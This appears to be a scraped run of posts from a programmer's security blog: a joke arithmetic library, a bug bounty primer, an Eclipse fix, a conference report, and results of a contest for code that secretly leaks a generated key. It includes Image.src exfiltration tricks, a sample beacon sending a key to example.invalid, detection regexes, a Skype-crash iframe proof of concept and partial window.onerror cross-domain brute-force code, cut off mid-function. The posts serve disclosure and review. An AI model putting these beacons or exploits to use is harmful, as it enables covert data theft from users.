The Java Hacker – Peter Jaric's Blog

### Mathemancy.js – a Framework for Natural Language Arithmetic in JavaScript

A while ago, while I was riding my bike to work, I thought: “Would it be possible to make one.plus.two.times.three evaluate to 7 in JavaScript?” I wanted to see if it was possible, and with some invaluable help from Mathias Bynens and Ingvar Stepanyan I was able to make it work.

I give you:

## Mathemancy.js

With mathemancy.js, you can write your arithmetic expressions using natural language in property access notation (this was the hard part). Great, huh? Some examples:

```javascript
three.plus.two === 3 + 2
two.three.minus.four === 23 - 4

var result = six.dividedBy.two.minus.nine.times.four;
result === 6 / 2 - 9 * 4
```

Please try it out yourself over at the small test bed I created for this purpose.

### Limitations

It is not possible to write, for example, minus.two or just two.

Neither parentheses nor any notation other than +, -, * and / is supported.

This won’t work:

```javascript
var forty = five.times.eight;
var fortytwo = forty.plus.two;
```
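As an added illustration of how such property-access arithmetic can be made to work (this is not the code of mathemancy.js, whose internals differ): a shared token list holds the expression under construction, the start words one..nine reset it, operator getters installed on Number.prototype continue it from the primitive result of the previous word, and every number word returns the value so far evaluated with normal precedence. The names `evaluate`, `pushDigit`, `pushOperator`, `startWord` and `demo` are my own.

```javascript
'use strict';

// Added example, not mathemancy.js itself: natural-language arithmetic via getters.
const DIGITS = { zero: 0, one: 1, two: 2, three: 3, four: 4,
                 five: 5, six: 6, seven: 7, eight: 8, nine: 9 };
const OPS = { plus: '+', minus: '-', times: '*', dividedBy: '/' };

let tokens = []; // the expression so far, e.g. [6, '/', 2, '-', 9, '*', 4]

// Evaluate with the usual precedence: * and / first, then + and - left to right.
function evaluate(toks) {
  const flat = [toks[0]];
  for (let i = 1; i < toks.length; i += 2) {
    const op = toks[i], n = toks[i + 1];
    if (op === '*') flat[flat.length - 1] *= n;
    else if (op === '/') flat[flat.length - 1] /= n;
    else flat.push(op, n);
  }
  let result = flat[0];
  for (let i = 1; i < flat.length; i += 2) {
    result = flat[i] === '+' ? result + flat[i + 1] : result - flat[i + 1];
  }
  return result;
}

// A digit word directly after another digit word is concatenated (two.three -> 23);
// otherwise it starts a new operand. Returns the value of the expression so far.
function pushDigit(d) {
  const last = tokens[tokens.length - 1];
  if (typeof last === 'number') tokens[tokens.length - 1] = last * 10 + d;
  else tokens.push(d);
  return evaluate(tokens);
}

// After an operator only a digit word makes sense, so hand back an object
// that has nothing but digit getters.
const afterOperator = {};
for (const [word, d] of Object.entries(DIGITS)) {
  Object.defineProperty(afterOperator, word, { get: () => pushDigit(d) });
}

function pushOperator(op) {
  tokens.push(op);
  return afterOperator;
}

// Getters on Number.prototype let the chain continue from a primitive result
// (e.g. the 3 that six.dividedBy.two returns). configurable so they can be removed.
for (const [word, d] of Object.entries(DIGITS)) {
  Object.defineProperty(Number.prototype, word,
    { get: () => pushDigit(d), configurable: true });
}
for (const [word, op] of Object.entries(OPS)) {
  Object.defineProperty(Number.prototype, word,
    { get: () => pushOperator(op), configurable: true });
}

// A start word begins a fresh expression, which is why a bare `two` is an
// object rather than the number 2 (compare the Limitations section).
function startWord(d) {
  const start = {};
  for (const [word, d2] of Object.entries(DIGITS)) {
    Object.defineProperty(start, word, { get: () => { tokens = [d]; return pushDigit(d2); } });
  }
  for (const [word, op] of Object.entries(OPS)) {
    Object.defineProperty(start, word, { get: () => { tokens = [d]; return pushOperator(op); } });
  }
  return start;
}

const { one, two, three, four, five, six, seven, eight, nine } =
  Object.fromEntries(Object.entries(DIGITS).map(([w, d]) => [w, startWord(d)]));

// The three examples from the post, each compared with plain arithmetic.
function demo() {
  return [
    three.plus.two === 3 + 2,
    two.three.minus.four === 23 - 4,
    six.dividedBy.two.minus.nine.times.four === 6 / 2 - 9 * 4,
  ];
}
```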

### Code

All code can be found at Github: https://github.com/peterjaric/mathemancy.js

Please feel free to create pull requests! Look at the Limitations section for inspiration. ;)

### Seriously?

This is a joke framework of course, but the code works, try it out yourself!

### 7 Reasons Why You Should Become a Bug Bounty Hunter

A while back, Gregoire Gilbert and Johannes Ridderstedt (then Lundberg) of the Uppsala Tech community asked me if I could write an article about bug bounty hunting for their upcoming magazine The Uppdate. Its first issue is now available at http://theuppdate.com and I’m very proud to be part of it. I recommend that you go there and download it to read the rest of the articles.

Uppsala Tech is a community that aims to advance the tech and entrepreneur scene in Uppsala, Sweden. Have a look at their site, and if you work in or with Uppsala tech, please have a look at http://www.uppsalatech.se and join the Uppsala Tech Slack group.

Without further ado, here is my text:

# 7 Reasons Why You Should Become a Bug Bounty Hunter

(First published in The Uppdate #1)

Software security is an increasingly important aspect when developing applications and other computer related products (such as IoT devices). Over the last few years more and more companies have been trying out something called Bug Bounty Programs to make their software more secure.

Bug bounty programs allow anyone with sufficient skill to hack into systems and products owned by the company, as long as any security holes are reported to the company before disclosing them publicly. Often such reports are rewarded with money or swag (T-shirts, stickers, etc.). Those who find and report vulnerabilities are called researchers or white hats.

Why (should you do it)?

There are many reasons you should consider becoming a bug bounty hunter.

You will:

1. Gaining knowledge about how to break applications built by others will increase your security awareness when building your own applications.
2. Earn money
Many bug bounty programs pay from $100 and upwards. If you, for example, manage to find an XSS in a Google site you will probably be rewarded with $3,133.7 or more.
3. Have fun
The reason something is fun is bound to be different for each person, but imagine playing an advanced game that only a few people in the world are capable of, and when you succeed in conquering a particular challenge, you receive thanks and money. Sounds great, doesn’t it?
4. Use skills you already have, if you are a programmer
Programmers know how applications are built and in particular they know the shortcuts developers take, which may introduce vulnerabilities. I believe this gives programmers an edge over other hunters.
5. Make the world more secure
Many researchers are driven by this point, to improve security for everyone. Sometimes you find something that you know would have been a disaster for lots of users if it had been found by an evil hacker (also known as a black hat). Reporting something like that feels good and motivates the company to keep their bug bounty program running.
6. By publishing your findings and ranking high on top lists you will display your skills to current and future employers. This may help you raise your salary or land you a new job.
7. There are lots of interesting people in the bug bounty community who gladly share their knowledge and are open to questions and even meeting up in real life.

What (should you look for)?

So, what kind of vulnerabilities are we talking about? In general, anything that allows you to do something you shouldn’t be able to do. Some of the usual vulnerabilities are:

• XSS – Cross Site Scripting. Injecting JavaScript code into a web page that another user is visiting.
• SQLi – SQL Injection. Injecting SQL commands into a SQL query that is run against a production database.
• RCE – Remote Code Execution. Running your code or commands on someone else’s server.
• IDOR – Insecure Direct Object References. When you access secret data by manipulating an ID (e.g. ?id=1234 -> ?id=1233).
• CSRF – Cross Site Request Forgery. Executing actions on another user’s behalf by secretly submitting a form to another site.

These are all web application vulnerabilities, but all kinds of security holes are interesting, of course. Read more about web vulnerabilities at the OWASP Top 10 (see the Links section below).

How (do you do it)?

First, learn how to exploit IDOR and then CSRF vulnerabilities; they are common and easy to understand. To find an insecure direct object reference, all you have to do is change a parameter in a URL (or sometimes in a POST request) to something that is not yours and see if you are allowed to access it anyway.

When you feel more confident, you can try out XSSes. These are also very common. Since they run in the browser, you can often find them without affecting other users. Begin by trying one of several online challenges, for example the XSS Game by Google (see the Links section below). When you get the hang of how to find XSSes, you can expand into other types. Recently, Krzysztof Kotowicz from Google held a presentation where he listed the things Google are looking for. Take a look at the slides (see the Links section).

So, you have found your first vulnerability, and now it is time to report it. This is mostly done through either special forms or plain old email. It is important to write a good report that makes the vulnerability easy to reproduce and assess, but on the other hand, that is all you will have to do, except for confirming that the vulnerability has been fixed. No regression testing, no complete coverage, just report the bug and you’re done!

There are chiefly two types of programs: self-hosted, for example Google’s and Facebook’s programs, and managed programs. The latter kind of programs are run through “bug bounty platforms” where all communication and payment is done through a company specializing in bug bounty programs. The big platforms are HackerOne, Bugcrowd, Cobalt, and Synack. Create an account on each platform and look through their programs. You might be familiar with some of the sites that are targets, and that always helps a lot when trying to figure out what might be possible to abuse.

Who (is doing it)?

Bug bounty hunting is an international phenomenon, but there are several very skilled and high ranking bug bounty hunters from Sweden. I’m not going to mention any names, because that would probably mean I would forget someone. Take a look at the leaderboards of the platforms to see who currently ranks among the top hackers in the world: http://hackerone.com/thanks, http://bugcrowd.com/leaderboard, and https://cobalt.io/researchers (Synack has no top list, since they are rather secretive).

Hopefully this has inspired you to go looking for security holes. Before you know it you will receive a mail announcing your first bug bounty!

Bug bounty platforms

https://hackerone.com

https://bugcrowd.com

https://cobalt.io

https://www.synack.com

Bug bounty programs

Bugcrowd’s big list of bug bounty programs:

https://bugcrowd.com/list-of-bug-bounty-programs

HackerOne’s directory with more than 1000 companies:

https://hackerone.com/directory

Miscellaneous

OWASP Top 10:

XSS Game by Google:

https://xss-game.appspot.com

Secrets of Google VRP. The bug hunter’s guide to sending great bugs:

HackerOne’s resources for new hackers:

https://hackerone.com/blog/resources-for-new-hackers

Bugcrowd’s “How to become a Bug Bounty Hunter”:

https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter

Swedish podcast Säkerhetspodcasten interviewing Frans Rosén about bug bounties:

http://sakerhetspodcasten.se/pods/sakerhetspodcasten-avs-52-bug-bounties-med-frans-rosen

Thanks to Frans Rosén, Mathias Karlsson, Mikael Weckstén, Linus Särud and Mårten Mickos for very helpful feedback on this text.

### Eclipse on a high DPI display (in Windows)

My work laptop is a Dell XPS 15 running Windows 10 with a high resolution display (3840×2160). Since everything becomes so small when using standard 100% zoom I have enabled a custom scaling factor (it says 350% in the settings, but I believe I actually set it to 200%). This works fine for most apps, but not Eclipse (Luna), where all icons become very very tiny.

This is known and there is a bug report for it. According to a comment at the end of the bug report this should be resolved in an upcoming version of Eclipse, but until then, or if you’re stuck on an older version, here is a workaround. I am not exactly sure where I found it, maybe in the StackOverflow question I referenced, but I’ve also added instructions to it for those occasions when it stops working. This helped me today!

Create a file called eclipse.exe.manifest in the same folder as the eclipse.exe binary, containing this:

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<!-- If this stops working, you must create the PreferExternalManifest registry entry. To do this, follow these steps:

Click Start, click Run, type regedit, and then click OK.
Locate and then click the following registry subkey:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide
On the Edit menu, point to New, and then click DWORD Value.
Type PreferExternalManifest, and then press ENTER.
Right-click PreferExternalManifest, and then click Modify.
In the Edit DWORD Value dialog box, click Decimal under Base.
In the Value data box, type 1, and then click OK.
On the File menu, click Exit to close Registry Editor.

https://support.microsoft.com/en-us/kb/912949
-->

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3">

<description>eclipse</description>

<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel xmlns:ms_asmv3="urn:schemas-microsoft-com:asm.v3"
level="asInvoker"
ms_asmv3:uiAccess="false">
</requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>

<asmv3:application>
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="http://schemas.microsoft.com/SMI/2005/WindowsSettings">false</ms_windowsSettings:dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
```

### An Øredev 2015 summary – Swedish only

This is a report about Øredev 2015 that I posted on my employer’s intranet. Due to the huge demand I asked if I could publish it on the internet. Unfortunately it is available in Swedish only.

This spring I happened to find a security hole on the website of the developer conference Øredev. As thanks for the help I got a free ticket, and for three days last week I was there soaking up new impressions and new knowledge. There were no fewer than eight tracks, so I had to pick and choose. Here I will try to summarise what I found most interesting and relevant for us in the systems development unit. So I write varying amounts about the sessions, depending on how much I think there is to pass on. Some sessions I skip entirely (e.g. “Unleash your inner console cowboy”, which turned out to cover the basics of BASH…).

Time to find out whether I brought home some knowledge and not just a bag of freebies, then.

The conference itself was professionally organised and fairly intense; for example there was no dedicated lunch break, you had to fit it in between sessions or skip a session entirely (which I couldn’t bring myself to do, so I ended up wolfing down the food). The selection was varied, since it isn’t a conference focused on a particular language, but as usual these days it leaned towards web development.

All (or almost all) sessions are uploaded to Vimeo here: https://vimeo.com/user4280938/videos and the schedule is here: http://oredev.org/2015/schedule. Some speakers have put their slides online, and in those cases I have linked to them, but either way the slides are included in each video.

### David Anderson – Social engineering for/with/using Kanban

One particular thing about Øredev was that they ran two keynotes per day, an opening one in the morning and a closing one in the evening. This was the first keynote of the whole conference.

David Anderson is a leading figure behind the agile method Kanban, and he began by describing how people are governed by their need to belong to a group and ended by describing how the Kanban movement has thought about avoiding the problems you can end up in if groupthink gets the upper hand.

The part about groupthink was fun and thought-provoking, but how many sources he had for what he said, I don’t know. Still, it rang true that if you have an organisation with clear roles and rules about what decides whether you are in or out, it becomes harder to think in new ways, since you then risk losing your membership in the group. And correspondingly, if the organisation is open-minded and not so strict about who gets to be a member and who does what, there is a good basis for innovation, but at the same time the group’s members are not as loyal and can leave the group whenever they feel like it.

Not very surprisingly, David said that one goal of Kanban was to have the second kind of organisation, and among other things he mentioned an incident where the biggest Kanban fans wanted to start something they called Kanbanistas, where apparently you would be admitted if you liked Kanban very much. This was the opposite of what David was after, and he “stamped it out quickly”.

The title of the presentation suggests that Kanban can be used for “social engineering” in various ways, and one example that could be directly applicable to how my team (Gemensamma webbfunktioner) works is to use the maximum number of allowed items in a column on the board to force collaboration. If you have 5 developers and the max set to 3, you must either choose to sit together and work or do nothing, which will quickly be noticed. I’m not sure I would vote for such an implementation of the max rule, though ;)

Another thing that struck me while listening is that we in my team say we do Kanban, but it is probably only a small subset of what Kanban can be. At first that felt a bit lame, but gradually I realised I don’t need to feel that way. Partly because a foundation of Kanban is to start with the process you have and change it incrementally, while respecting the roles that already exist, and partly because there are no Kanbanbutts (see The Scrumbutt Test, http://www.leanagiletraining.com/better-agile/the-scrumbutt-test/), precisely so that it is easy to get started and take part.

David Anderson was fun to listen to (as a keynote speaker should be), so I recommend having a look when the video turns up.

Slides here: http://www.slideshare.net/agilemanager/social-engineering-with-in-for-kanban

### Todd Gardner – JavaScript Forensics

Todd Gardner is behind https://trackjs.com, and in this presentation he went through various common JavaScript error messages, what causes them and what you can do about them. For example, an included JavaScript file can fail to load, and then you usually get lots of errors in your JavaScript logs (if you store them). Do have a look at the presentation if you have a lot of JavaScript code.

### Bruno Borges – Nashorn: Javascript on JVM, from Scripts to Full Apps

Here we got to see how to use JavaScript from within Java and Java from within JavaScript. It may sound a bit contrived, but if you like the JavaScript language itself and want access to Java’s large library of classes, it is a very good combination. Especially via the jjs command, which I didn’t know about before.

You run jjs from the command prompt, either without arguments, which puts you in an interactive mode, or with a file name as argument, in which case the code in the file is run. One consequence of this is that you can use jjs/JavaScript in shell scripts by putting #!/usr/bin/jjs -fv at the top of your script file. As far as I understand this only works in Java 8 and later.

Unfortunately I can’t find any slides.
Video: https://vimeo.com/144703271

### Niall Merrigan – Website Fuzzies

Niall went through a group of tools and platforms that you as a developer can use to automatically security test your web apps before releasing them to production. That is already somewhat my area, but Niall’s point was that all developers should learn some of these tools, that it will be required, or already is required, of us to find security problems already in the development phase. He showed quite a few tools I had never used, so it was instructive.

Unfortunately no slides here either.
Video: https://vimeo.com/144674803

### Honza Král – Collect all the data!

This guy comes from the company that makes ElasticSearch, so the presentation revolved around that product and two others in their portfolio, LogStash and Kibana. All of these are open source, as far as I understand, and the concepts were general, so the presentation was interesting anyway.

The crux was that you should save all events from your applications and servers in a central (but distributed and fault-tolerant, of course) log and then hook up a capable search engine and a visualisation interface. That way you can troubleshoot and analyse what has happened when various problems occur.

You can also use the search engine to get data that can be used in the applications. Honza exemplified this with a recommendation engine for music. All listening events are stored in the log, and then the search engine can be used to find music the user ought to like, based on other users with the same taste in music. This was really mostly a demo of what ElasticSearch can do.

I do like the idea of logging to a common log, to simplify troubleshooting. And preferably logging events of various kinds, so that they can be correlated with the usual error messages in the log. For example logging when users perform operations you know are heavy, how many are logged in right now, and so on.

No slides, unfortunately.
Video: https://vimeo.com/144676868

### Emil Kvarnhammar – The Most Dangerous Software Errors

This was a fairly conventional security talk where Emil went through different types of vulnerabilities, but instead of taking them from the OWASP Top 10, as is customary, he used the CWE/SANS Top 25. I’ll summarise the whole thing with a quote he had in his slides:

If you know the enemy and know yourself, you need not fear the result of a hundred battles.

Sun Tzu, The Art of War

Slides missing, again.
Video: https://vimeo.com/144645134

### Amy Phillips – Making Continuous Delivery work for you: An Experience Report

Amy Phillips talked about how her company SongKick changed its release process to be able to deploy often and easily. I took notes quite frantically, even though the topic wasn’t exactly James Bond-exciting, and here are a number of things she recommended/claimed:

• Don’t have the same process for all kinds of fixes. A small bug fix shouldn’t have to go through the same steps as a new feature.
• The developers should be responsible for quality in production; that responsibility shouldn’t rest only on test and someone who signs off the release.
• Before development of a new feature starts, have a meeting with all stakeholders, so that the right thing gets built. (Here I think the agile way of working could have been emphasised more, surely one meeting isn’t enough?)
• Have a common, agreed test strategy across the whole team so that how well tested something is doesn’t depend on the person.
• Establish the value “The development team is responsible for its own testing”. That is, not the individuals, but the whole team.
• It is important to distinguish between testing and checking, where the former is searching for faults and the latter is a plain check that the right thing has been developed.
• The advantage of continuous delivery and automated testing is that you get very fast feedback.
• Since they release much more often, unfinished code reaches production, and therefore they use feature flippers much more.
• These flippers can be switched on and off by anyone with admin rights in their admin tool.
• They have the motto “You can break anything once”.
• You should have fast and well-maintained automated tests, to avoid the time-consuming manual tests before release.
• Since they can release so quickly, some bug fixes can go out in just minutes. That gives a very good relationship with the customers.
• To reach this nirvana (my wording), tackle the biggest problem holding the team back first, then the second biggest, and so on…

A pity there are so few slides.
Video: https://vimeo.com/144828003

### Chris Noessel – A Model of Agentive Interaction (through 2 examples)

This turned out not to be hugely relevant to our daily work, but it was still a very interesting talk about how two different “agents” (roughly as in “software that performs a task on the user’s behalf without needing much direct control”) work. One of these agents was the small Swedish-developed camera Narrative (formerly Memoto). See the presentation if that sounds interesting.

Can’t find any slides.
Video: https://vimeo.com/144799183 (this turned out to be presentation 2; part 1 is here: https://vimeo.com/144687906)

### James Turnbull – Orchestrating Docker

Docker is an interesting solution for running lightweight containers with operating systems, servers and applications. You can run it as a development environment that is predictable; every time you start it, the same software runs. You can also run Docker in production. This presentation was about how to run several Docker containers and relate them to each other, e.g. if you have several application servers, two databases, etc. There are several different tools that vary in complexity.

The simplest seems to be docker-compose, where you essentially seem to need a single configuration file describing how the servers fit together. The drawback of this tool is that it only supports a single host machine. If you want to run your Docker containers on several different machines you need something else.

The tools that solve this are Docker Machine, Docker Swarm, Kubernetes and Mesosphere (see the video for descriptions and demos).

### Henry Stapp – DevOps in Large Companies… Is it Possible?

Can you make DevOps happen in a large organisation? Henry Stapp spent 40 minutes describing how he thinks you should go about it.

According to him, the main obstacles are not technical but cultural. Since most people in larger organisations are afraid of getting the blame if something goes wrong, and since changes can have large effects, meetings and various checkpoints are required to get things through, which prevents innovation and agility. Therefore you should work with the system and not act the rebel, because then you risk triggering the organisation’s immune system (and being reassigned or obstructed in various ways).

Various things to keep in mind:

• Try to automate checkpoints.
• IT is often seen as a cost, not a competitive advantage.
• When you set up DevOps interfaces they should work for all developers, not just the elite developers who know everything.
• There are often large amounts of legacy systems that have to be taken into account.
• Even though change is hard, you have to, otherwise some more agile upstart will come along and eat you.
• It won’t happen unless the developers drive it and communicate upwards.
• Do it as skunk works; create sandboxes that make it easy for others to try DevOps.

Slides: no
Video: https://vimeo.com/145052084

### Martin Kleppmann – Streams as the team interface

The idea in this presentation was to use a central log (in this case Apache Kafka was mentioned) to log all events to. Other parts of a system (if it is built from independent parts, roughly like microservices) can then consume this log instead of being in direct contact with the source. Unlike many other, more concrete presentations, this one was more forward-looking.

His example was a database that logs all writes to the central log, and then a server that builds an index reads the log from start to finish. If you later want to create a new, better index, you just read the log from start to finish again and then point the users at the new index.

Martin put it like this: “Like UNIX pipes, but for distributed data”. Because this decouples the different subsystems from each other, it is something you can use to let different teams work against each other’s subsystems much more smoothly.

### Üstün Özgür – Standing on the Shoulders of Giants or How to Read the Internals of React.js

Here we learned why and how to read other people’s code, specifically code in libraries you use. Among other things he mentioned the command “ag”, which is supposed to be better than grep for source code in particular (I just tried it and it actually seems really good).

### Aaron Gustafson – There Are No “Buts” in Progressive Enhancement

This was a fairly practical crash course in how, in various scenarios, you can get a website experience that is good regardless of whether JavaScript works perfectly or whether you are using a full-width browser or not. I particularly liked how he described making a login box that was hidden and shown using only CSS (http://www.slideshare.net/AaronGustafson/there-are-no-buts-in-progressive-enhancement-redev-2015/36).

### Keynotes generellt

Øredev seems to have as a concept that their keynotes should be inspiring, but not necessarily tied to development, and I liked that. We got to hear about self-driving cars, attempts to bring extinct animals back and how the film Kung Fury came about, among other things.

So it wasn’t just like this:

### The First JavaScript Misdirection Contest

Finally we have a winner!

But first, some background. One month ago, on the 29th of August, I announced the JavaScript Misdirection Contest:

There is a programming contest called The Underhanded C Contest. In their own words, it is “an annual contest to write innocent-looking C code implementing malicious behavior”. I am very much intrigued by that concept, but as my C-skills have declined considerably, I recently wished that there also was a JavaScript version. Pepe Vila suggested that I should start one myself, and here it is.

In short, the goal of the contest was to write code that generated a key for a made-up crypto coin called VDC, and at the same time include hidden code to send that key to your own server. Read more about it, and all the rules, over at misdirect.ion.land.

The kind people over at Detectify (who make a great web based security scanner) donated the first prize, a cool pentesting device called the USB Rubber Ducky Deluxe.

The contest ended the 13th of September, and at that time I had got 40 submissions, of which 34 were valid. The number of submissions and the nice comments I got from the contestants made the contest a success to me.

## The winner

And now to what you’ve all been waiting for, the results. I have decided to award the first prize in the JavaScript Misdirection Contest #0 to…

Aymeric Beaumet!

Congratulations!

I liked his submission because it is short and still manages to include hidden evil code. Most other contest submissions were far longer. You can check out his entry over here: http://jsfiddle.net/c6z0kb4g/0. I’ve included Aymeric’s own description of his submission, but not right here.

The runner-up is Jesse Eedrah, who used a cool unicode trick to misdirect the reader. You can find it here: http://jsfiddle.net/afswj8cL/0. Jesse also put an explanation on GitHub: https://github.com/eedrah/Javascript-Misdirection-Entry

The other entries follow at the end of the post (except for a few who wished to be removed from this list). Do you think I made the right choice, or is there a more worthy winner?

## Submitted code

Some random thoughts about the submissions:

• Many contestants hid the evil code in a Base64-encoded block, often masked as a seed or key.
• Using Image.src as a way to send the key was very common. I also used it in my example, maybe that was the reason.
• Another trick used by more than one was to include a link to StackOverflow in a comment. I think that was quite clever, because as a code reviewer (and creator) I am used to finding this kind of comment explaining unusual code.
• Generally I find it easier to skip over code that has a good comment above it, so I think that is a good trick too.
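The observations above double as a review checklist. As an added example (not code from the contest or from any entry), here is a small static reviewer that flags exactly those patterns in a piece of JavaScript so a reader knows which lines to slow down on: long Base64 "seed" literals (and whether they decode to something that reads like code), Image.src beacons, calls that turn data back into code, non-ASCII characters in the source, and reassuring StackOverflow comments. The function names and the sample input are my own; `example.invalid` is a reserved, non-routable name.

```javascript
'use strict';

// Added example: heuristic reviewer for the misdirection tricks listed above.
// A hit means "read this line carefully", it is not proof of malice.
const BASE64_LITERAL = /['"`]([A-Za-z0-9+/]{24,}={0,2})['"`]/g; // long "seed"/"key" strings
const IMAGE_BEACON   = /new\s+Image\s*\(/;                        // new Image() as a request
const SRC_ASSIGNMENT = /\.src\s*=\s*[^;\n]*[+`$]/;               // .src built from dynamic parts
const DYNAMIC_CODE   = /\b(eval|Function|atob)\s*\(/;            // data turned back into code
const NON_ASCII      = /[^\x00-\x7F]/;                           // homoglyphs, invisible characters
const SO_COMMENT     = /\/\/.*stackoverflow\.com|\/\*[\s\S]*?stackoverflow\.com[\s\S]*?\*\//i;

// A decoded "seed" made of printable ASCII with code punctuation is more
// likely to be JavaScript than key material.
function looksLikeCode(text) {
  return /[;{}()=]/.test(text) && /[a-z]/i.test(text) && /^[\x20-\x7E\s]*$/.test(text);
}

// Returns [{ line, kind }] for every suspicious pattern found in `source`
// (line numbers are 1-based; file-level findings use line 0).
function reviewSource(source) {
  const findings = [];
  source.split('\n').forEach((line, i) => {
    const n = i + 1;
    for (const m of line.matchAll(BASE64_LITERAL)) {
      const decoded = Buffer.from(m[1], 'base64').toString('latin1');
      findings.push({ line: n, kind: looksLikeCode(decoded) ? 'base64-code' : 'base64-blob' });
    }
    if (IMAGE_BEACON.test(line) || SRC_ASSIGNMENT.test(line)) findings.push({ line: n, kind: 'src-beacon' });
    if (DYNAMIC_CODE.test(line)) findings.push({ line: n, kind: 'dynamic-code' });
    if (NON_ASCII.test(line)) findings.push({ line: n, kind: 'non-ascii' });
  });
  if (SO_COMMENT.test(source)) findings.push({ line: 0, kind: 'stackoverflow-comment' });
  return findings;
}

// Constructed sample in the spirit of the entries: a Base64 "seed" that is
// really code, a beacon via Image.src, a homoglyph identifier and a comment
// pointing at StackOverflow. Not taken from any real submission.
const HIDDEN = "new Image().src = 'http://example.invalid/?' + key;";
const SAMPLE = [
  "// Key derivation seed; see stackoverflow.com for why it has to be Base64",
  "var seed = '" + Buffer.from(HIDDEN).toString('base64') + "';",
  "var key = generateKey(seed);",
  "var img = new Image(); img.src = 'http://example.invalid/?' + key;",
  "var p\u0430ram = key; // constructed homoglyph: Cyrillic a inside the identifier",
].join('\n');

// Summarise the findings as "line:kind" strings.
function demo() {
  return reviewSource(SAMPLE).map((f) => f.line + ':' + f.kind);
}
```

Running `demo()` on the sample reports the Base64 literal on line 2 as decoding to code, the beacon on line 4, the non-ASCII identifier on line 5 and the StackOverflow comment.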

## Next time?

This was the first JavaScript Misdirection Contest. That kind of implies that there will be another one. :) Hopefully I will run it again later on, but probably not until next year. I’ve learned a few things from this round; most of all that it takes a lot of time, which I don’t have. So the next time I will try to do things a little differently, and luckily I have a few ideas.

## Thanks

I have not done this all by myself. I’d like to thank Jacob Soo, Jonatan Heyman, Victor Haffreingue, File Descriptor and Detectify.

## Other solutions

These are the other valid submissions (except for those who elected to be removed):

• _nderscore http://jsfiddle.net/now9fmvv/0
• A. Levin https://jsfiddle.net/31vnwus9/0
• Agop Shirinian https://jsfiddle.net/fs885ys8/0
• Aleksandr Belkin http://jsfiddle.net/8tL4m43j/0
• Alex http://jsfiddle.net/z4v88k00/0
• Andrew Moffat http://jsfiddle.net/xvdmch0s/0
• Aymeric Beaumet http://jsfiddle.net/c6z0kb4g/0
• Calle Svensson https://jsfiddle.net/qpfs1vjz/0
• Carl Zulauf http://jsfiddle.net/nvL6g8xd/0
• Craig Spence http://jsfiddle.net/74k2hd7e/0
• David G http://jsfiddle.net/w02rdLcn/0
• David Roberts https://jsfiddle.net/4nqnhrpp/0
• Donald Abrams http://jsfiddle.net/by6ukh09/0
• Duncan Hall http://jsfiddle.net/gp80d9pf/0/
• Emil Stenström http://jsfiddle.net/6epxLfny/0
• Ephi Gabay http://jsfiddle.net/65p7y1xf/0
• Eran Schoellhorn http://jsfiddle.net/absf4uur/0
• Evan Hahn https://jsfiddle.net/jjr6nfjd/0
• Jeka Kiselyov http://jsfiddle.net/pLntoqj0/0
• Jesse Eedrah http://jsfiddle.net/afswj8cL/0
• Jonas P. Hyatt http://jsfiddle.net/b0cLhfqu/0
• Jonathan Mann http://jsfiddle.net/1b41dehs/0
• Kaley Crum http://jsfiddle.net/y8L8ar4a/0
• Kamil Vavra https://jsfiddle.net/ashvwfz0/0
• Kevin Bedi http://jsfiddle.net/esgrdjag/0
• Kristov Atlas http://jsfiddle.net/m9qxh8q1/0
• Michael Hayes http://jsfiddle.net/n0hLga7p/0
• nick http://jsfiddle.net/omeeshu3/0
• Olivier Arteau https://jsfiddle.net/watLyqzj/0
• Ondřej Žára http://jsfiddle.net/3qgun1u1/0
• Peabnuts123 http://jsfiddle.net/fgw464v5/0
• poerhiz http://jsfiddle.net/a39qwbv7/0
• @devsbh https://jsfiddle.net/4je730xn/0
• Stephen Checkoway http://jsfiddle.net/ptgru5du/0
• Timo Kissing http://jsfiddle.net/sk7c3o57/0

## Aymeric’s tricks

The tricks behind his solution, in his own words:

– perform a request leveraging Image.src
– generate the seed as being `src`
– use the seed to generate the domain name (src.sr)
– obfuscate the url construction as if it was the hash

Will send the generated key to __generated_key__.src.sr (necessitates the proper DNS CNAME wildcard)

### Crashing Skype with a Malicious URL

Some time ago I noticed that it is possible to create Skype links for starting a chat with your account. This is how one of these URIs would look:

I started to play around with this and soon noticed that if you changed the “T” to a “U” and opened the URL in your browser (Chrome or Firefox; strangely, it didn’t work in IE), Skype would hang or crash (after allowing Skype to open it, if that hadn’t previously been set to yes as the default). As I have close to zero experience with exploiting that kind of thing, and since I didn’t have time to learn it right then, I just sent this simple PoC to Microsoft Security:

<iframe src="skype:%23 SECURITY UPDATE %2F%24*U%3B 2015 ?chat">

(I tried to make a convincing message to trick the user into clicking OK, but that’s only necessary if Skype isn’t allowed to open Skype-URIs already.)

A little while ago I got this back from them:

We have completed our investigations regarding the issue you have reported and it has been fixed. We will be acknowledging your name in our Security Researchers webpage for the month of March.

It would have been interesting to see whether a flaw in a desktop app could earn me something more than a Hall of Fame mention, but I guess you need to provide at least some kind of exploit for that.

(For the record, Microsoft Security told me it was OK to post this.)

### Using window.onerror to Brute-force Cross Domain Data (updated)

Update:

I got a lot of interesting comments on Twitter about this post, and among them the obvious problem that this approach is slow. Then it hit me: I can do this as a binary search to make it much more efficient. By doing this, I am able to brute-force 1 million guesses in about 5 to 10 seconds. It’s not extremely fast, but depending on the application, it can be enough. Here’s the revised code that does this:

// Load a script from a url and then call the callback
// From http://stackoverflow.com/a/950146/185596
function loadScript(url, callback) {
  var head = document.getElementsByTagName('head')[0];
  var script = document.createElement('script');
  script.type = 'text/javascript';
  script.src = url;
  // onload fires after the script has executed, even if it threw a
  // ReferenceError (that error reaches window.onerror first).
  script.onload = callback;
  head.appendChild(script);
}

function binarySearch() {
  var i, split, next;

  if (wasDefined && defined.length === 1) {
    // The single remaining candidate loaded without an error: found it
    console.log('Found: ' + defined[0]);
    console.timeEnd("binarySearch");
  } else if (!wasDefined && notDefined.length === 1) {
    // The single candidate we never defined caused the error: found it
